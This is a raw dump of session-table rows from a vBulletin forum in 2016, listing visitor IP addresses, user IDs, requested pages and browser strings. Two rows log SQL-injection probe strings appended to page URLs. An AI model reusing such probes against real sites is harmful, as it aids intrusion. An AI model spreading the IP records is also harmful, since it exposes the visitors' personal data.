('51aa996c1924e175f5df53df350cb6b6', 0, '198.252.153.226', 'c993b08744b7e1f93ddf3dbdd41b0d9b', 1466262641, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('153bfb141e8eb1c32309233281c9944b', 0, '46.211.201.244', 'ee647df18372b82e81fb80fba9eeba9c', 1466265091, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('73776af02070f7e34ed9dfecadeb035e', 0, '151.237.177.131', '32422dbcac047c7c7b356037eecf906c', 1466265253, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d8426c5989cdc42ff6abbc01dbbd08ba', 0, '172.68.10.244', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471489186, '/archive/index.php/t-1867.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('8987b6033985e52b566d63483c133e2e', 0, '83.220.237.251', 'adcf07688cad6f759bc041899b311191', 1466270270, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2af6bd73c83d98ec68a435fe15f42276', 0, '2a02:580:8f00:4', 'af95264096277ac207ce09650639dad0', 1466272727, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('95e8e6262e981601f9be390f629a140d', 0, '5.196.177.120', 'e52c4bc50efb8911db8f14a08d51d072', 1466274131, '/index.php', 'python-requests/2.10.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('681d9f22f3f2bbbb84b68deb09ca4003', 0, '46.216.47.150', '927e110c605af406df65309d2998aff1', 1466274470, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9f43e213eb36948a701636c21d7c9ad7', 0, '91.239.78.43', '85327f7af158bb109a9df17778dfffe6', 1466275167, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a5e89ac1ecddfbdd6d3810f2f043a64e', 0, '172.68.34.51', '8c2a58ed4130be298d50116da95b8cf5', 1469581703, '/archive/index.php/f-37.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('093aecf246415dfb5bc9e098d7d881d8', 0, '172.68.10.252', '4edbba83da50c0d6bbd6fea7df0ee008', 1466280363, '/index.php', 'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f51392fc348de2dd6724883c992bfd3d', 0, '172.68.34.51', '37a60411c341250cf0113f4eba911963', 1468871391, '/showthread.php?t=1030', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('966a732c6f3cc431cc3a707aa4ab7667', 0, '77.153.153.180', '98aff124f69c03aad2d8ccac0dfc2eb7', 1466282489, '/showthread.php?t=1841', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('495365cba8a7894681db9c8be6bffcc5', 0, '172.68.34.58', '8c2a58ed4130be298d50116da95b8cf5', 1466286352, '/showthread.php?t=2390', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e7d0c178991cb3937c79e8dda431fb69', 0, '172.68.34.90', '37a60411c341250cf0113f4eba911963', 1470286090, '/member.php?u=340', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('403fc1bcc2e692d0a562195ef3ab334f', 0, '172.68.25.84', '611c339de116daf9bca02df6abaf5b5c', 1466290392, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8ffb248d3324288c7f0927da33ca14a0', 0, '172.68.34.57', '37a60411c341250cf0113f4eba911963', 1470279413, '/member.php?u=6', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c85abc1615a7307a0a19e2e19623e769', 0, '172.68.29.171', 'd19f019de634d739ba40fc6bb7b6f141', 1466292521, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('84879a104e0e11be3cf050137760c0cf', 0, '172.68.34.92', '8c2a58ed4130be298d50116da95b8cf5', 1466571230, '/archive/index.php/t-1024.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('a2728c10c1610f5f10be5af0d97698df', 0, '192.42.116.16', '5f8bcf1d8b5592898610c36cd6efcae9', 1466293656, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f9174754460d9d9e8b9bd52cb488ed4e', 0, '69.197.183.110', 'f60850dc9a381be9c34fc3f5dce99aff', 1466294092, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9f7f6211aa6667ab597157745cd4fa42', 0, '172.68.34.92', '37a60411c341250cf0113f4eba911963', 1469529925, '/archive/index.php/t-2461.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('1b45a0f4da18b8da521cd10cf696f4c5', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466297412, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('268d36bc0a9293baad0407f8e9961962', 0, '128.70.30.100', '28a3995e07183cc4ec8bb2bf89e18d29', 1466299805, '/index.php', 'Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8d1f697ef6c6ecd0c5620f3188b5a53a', 287, '187.158.110.214', '369cb9e6b147b026b3158434d7fd38c8', 1466300159, '/showpost.php?p=3015&postcount=1', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('8e6fa468acb4749cb1aae8bdcbcecc2f', 0, '172.56.26.108', '2b5e7e2829ee49839d5ddffc38ecd832', 1466306273, '/memberlist.php', 'Mozilla/5.0 (Linux; Android 5.1.1; LGMS330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('67b12cb335524a77dd80b366c5d9f131', 0, '172.68.34.49', '8c2a58ed4130be298d50116da95b8cf5', 1469623554, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f32b9c526c4b3d144082371315f6bdfe', 0, '2a02:598:2::172', '00a25ffb10c4eb70abad4234c9dd1943', 1473126175, '/search.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8e06d5a76c41de142212d7ee8d3f2833', 0, '172.68.34.50', '37a60411c341250cf0113f4eba911963', 1470271421, '/showthread.php?p=1595', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c7b5116b4c14b9b5eda4e11fd8b636f5', 0, '13.76.244.224', '15c7c54a977df4036f6b5252c5acae47', 1466313670, '/showthread.php?t=1837\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ba645c7d64c19f3bdf0c29d1616f85e9', 0, '193.255.135.254', '189b658d24d0e145eca80ab6a362c248', 1466319508, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6919f19806dd185ce1377c7649179ec6', 0, '172.68.11.200', '3276229e9ef0a7c7a1672009e79d2e28', 1466321950, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('739661850a25079eff17f2f9b81654a8', 0, '172.68.10.206', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475245471, '/showthread.php?p=2840', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de585612b24ad44691f6ecd84ffc65c3', 0, '172.68.10.254', '34c3e0d31f8dd68ab66fec125726e1a4', 1466320381, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('069d8b161548757ab0e2550c18007bf1', 0, '172.68.34.83', 'dce73380cf0fd3aff82da93d9252bb04', 1469603125, '/index.php?langid=2', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c6afcbc0460ba26624786687522b3fcc', 0, '151.238.88.44', '0174595fb84cc3172e7a45cef0b060d8', 1466325170, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a64f53f7e3a2984f0be9ec210f146b98', 0, '109.209.128.114', '46382a81978a48a66144d3fadaede469', 1466328709, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8c6f04be4a32db38fb0c24d05bd6462e', 0, '172.68.34.47', 'dce73380cf0fd3aff82da93d9252bb04', 1467961143, '/showthread.php?p=2786', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('641ab5b0ac5128decc6114fd064fd2d6', 0, '188.166.91.5', '9e2ef72ab58a494bfc4c8473d9555033', 1466332923, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fe7374b12824087e6e259258616d5244', 0, '217.79.190.120', '8a1c1a63bcfae23df978249790e0441b', 1466334556, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f2027606fe1a66d300885bbdd23923cc', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466335342, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('0fb04a42db7997031f6d88ed8e342627', 0, '172.68.34.91', 'dce73380cf0fd3aff82da93d9252bb04', 1469695801, '/search.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('94a65af7df0151e70061bdcde20bdf30', 0, '2.247.247.152', 'c3baa5959f100a1cf367028df539dad3', 1466336260, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fd75d1af4a907657f3ac5cb4c7c4cdb4', 0, '89.22.164.15', 'dffcd712b755f4b6f1b96a805a669575', 1466338843, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('db5efa41e79e1164be73ada14af48315', 0, '105.111.113.211', 'd96d2681c4665744cf09b5a10672e090', 1466339849, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G925F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('efecc6fbb5660a7371a95c4436f93c23', 0, '94.242.228.100', '6301393b60cd6df50c44bb84a5664284', 1466340908, '/register.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('21cf3124470b3861545c5cc2b3546670', 0, '79.201.104.174', 'b5952062d8e6330f85e40ad144b5a762', 1466341856, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('05baf621be3d19947391eec4cc883a87', 0, '95.195.196.62', '817bea15bae902ff8f2d8bcb56d88aa9', 1466342897, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; D6603 Build/23.5.A.0.575) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d76d8ac004309bc3b9f002d35cfe6291', 0, '172.68.10.248', '9261cd425d39c4ceeabfa3c58b018db5', 1466349816, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 YaBr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e5058157ccfca2de53686eab5a37642', 0, '162.253.131.178', '2606533bff6d25643554ba9799be6060', 1467355558, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c1ab3b985c0cd00f05a7ce32c7d86874', 0, '194.62.232.102', 'f715917103cc4883391d1086c45f037b', 1466353634, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0a36625af4b38f57654bf02f517a9e0d', 0, '172.68.29.200', '6e46b6fce6efba3c009795a524d049e6', 1466358750, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3eaa5d426d998cfbd9d847144e157ab6', 0, '70.52.111.113', 'b8674dd744e692bb089f263b9c97c2a8', 1466358925, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b129dbdadc30bb1fdf92c43b6a29ad3e', 0, '88.243.18.124', 'ed41c3a9e38394b91e397070ded6648a', 1466368573, '/index.php', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f81a4ca49828b85e3c035fb0b7b11939', 0, '104.200.151.88', 'f2ccccaf7f47783e0ed8f123417162c8', 1466368884, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7cff3cb79e2e0b7f44aecc93350becc8', 0, '88.251.82.239', '7c0c77d41f6ef61195c7f0c732df6cac', 1466370486, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('874771143fd1d61ef3849002dbe8653e', 0, '66.249.66.176', 'b4343dffbdc847519606d6eb72cdaefd', 1468722702, '/member.php?u=270', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ae63e9d46bdc01bf6ae1212e81ec7fb2', 29, '94.242.210.194', 'b89ec9084a43d0525bcade06695a27a4', 1466372565, '/admincp/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('c96e41defa6d8f7e9a1f060f49190892', 0, '109.65.123.169', '42e8582ffd75c1fa616d5b03c76144af', 1468481381, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cfc3a014937df532dce34445e084242e', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466374146, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5116ba35c052d68c8967a5076c052c91', 0, '73.210.53.189', '00467555af40c51df1cf6599e03be199', 1466376229, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('32ab6b8fd442be3f25bd6bd7ee65079c', 0, '207.46.13.33', '5e207e311e22cdc3b2095126a922fa93', 1466388890, '/showthread.php?p=3017', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7f4cb8c68ddd981336a52ae5c2da5ade', 0, '207.46.13.163', '5e207e311e22cdc3b2095126a922fa93', 1466402420, '/faq.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1b6bbd425ace48ff4ec0c4c9c871d88a', 0, '207.46.13.185', '5e207e311e22cdc3b2095126a922fa93', 1466388901, '/showthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f601c422dd7e2fce2e405c970078bc95', 0, '207.244.77.9', '25146b6e94495873f675704aaed97081', 1466378334, '/showthread.php?t=1030', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/50.0.2661.102', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('731b921fb81fa327626c0f938a597018', 0, '82.210.1.19', '376b8374d9abc209000b4db11faa826a', 1466378674, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd5b084529ead6e6db72cfaf52fff2c5', 0, '128.238.182.74', '61b1b28977c41576543ad23baf692395', 1466379474, '/index.php', 'Mozilla/5.0 (compatible; ACHE/Unknown Version; +https://github.com/ViDA-NYU/ache; )', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('daff54bef8cf7939ce80a34cfdf087e8', 0, '40.77.167.38', 'c5490a5a8e1813ac25cf9e19091dcb85', 1466388906, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5d4f332beafa68055346ebe21a694c99', 0, '172.68.29.148', 'fa010efe27e6acdeee4235bec2f5abbe', 1466389096, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('60a3936578a30f20d8f504159643dc98', 0, '1.177.171.3', '2e0b97ddc4352627815f1f445d31a880', 1466398602, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('34b1dc99304b891ed3fc63772b862006', 0, '123.126.68.100', '8b5e6bbb63e099ad279d8882b9221dac', 1466405780, '/showthread.php?t=1837', 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e78949950eed14d64a5281dca5886ca8', 161, '54.233.145.152', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1466407662, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('fba388b797f8d71f7cc2cbcdee9e2f66', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1466411136, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('2167d9876ec788534bc41cb54102d668', 0, '182.92.253.1', '6c8c8b3d408dd52fa55fcdd392178732', 1466411651, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3f1eea0884ccfb93b57e4fd62a163f65', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466413481, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('dd8950ae2018c291df23f00e02786d74', 0, '2601:985:200:22', 'd66fe7bfe34b7335f0a2fe9938ff3438', 1466421873, '/showthread.php?t=1030', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ee7343fd7bf2529d114451eeab2d23b1', 0, '31.24.221.3', 'cb6019e2d81f824cb76edcab80feb888', 1471429717, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0e02d15e23010b0b8f7e39cc976c5e57', 178, '40.118.100.140', 'caa0ad139617ed23fc90e9d0d052200f', 1466429858, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('5944a06723d115bf401a262a3f7fbc65', 0, '77.232.21.79', '1267db46f2bcf2e897782af78034551f', 1466431133, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7c0d7a4cc78b09cb0589c33127c3fb7d', 0, '31.179.210.234', '2a73bcea74ca5d4cad3fa872783d832b', 1467636931, '/showthread.php?p=2995', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9b4d26795af8b50116f0457a3e3a90fa', 0, '172.68.34.80', '8c2a58ed4130be298d50116da95b8cf5', 1467335161, '/archive/index.php/t-1674.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('f7ecbf4433facb3eece15df85ee60990', 0, '2a01:e34:ec37:7', '5ee0348993c8d05a4fd3acaa7b2b83aa', 1466448762, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2a2b5700d66d2d1074db4ff641140a5b', 0, '51.255.169.49', '6e37b09dd9a32a8e674c88b3a2a0046e', 1467230002, '/index.php', 'Mozilla/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('82175ee80fca207f1504714947c0c133', 0, '76.169.51.126', '584d8ede73903debe079877a2544db87', 1470243280, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ab39cca12ba26b504dc62f976baf703a', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466453399, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a5cdf8a74c171c6c5dfa8538ff99d1aa', 172, '2.187.35.251', '60df9ca0509bc1998d1b482683365f2f', 1466456676, '/private.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('751b0600e22baddbced529939f05d363', 287, '187.158.110.214', '369cb9e6b147b026b3158434d7fd38c8', 1466456893, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('aed55567338d73a1582fd5f7ff802386', 0, '110.174.100.239', 'c1d0d0c2748961325cbce3f4c68a4a8b', 1466463279, '/showthread.php?t=1031', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e53383f44d6ae51e23158a86f1f83c6', 0, '2a01:360:106::2', '2ad6f9acb794d4e08673400822fc50d2', 1466463815, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a4cffc9627d5d50fc9891e994c07cdb5', 0, '37.143.90.32', '88ceae6fb1abec27a81edc7036b18240', 1466463767, '/member.php?u=39\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c290d7c9ac3907e16dd8a86be332af80', 0, '84.19.189.10', 'a919c2f1bd34ba0f75026530baf7277a', 1466464034, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('893b3c811fa8c53e77fa80ab23c03362', 0, '172.68.11.244', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1471484812, '/misc.php?do=whoposted&t=1657', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
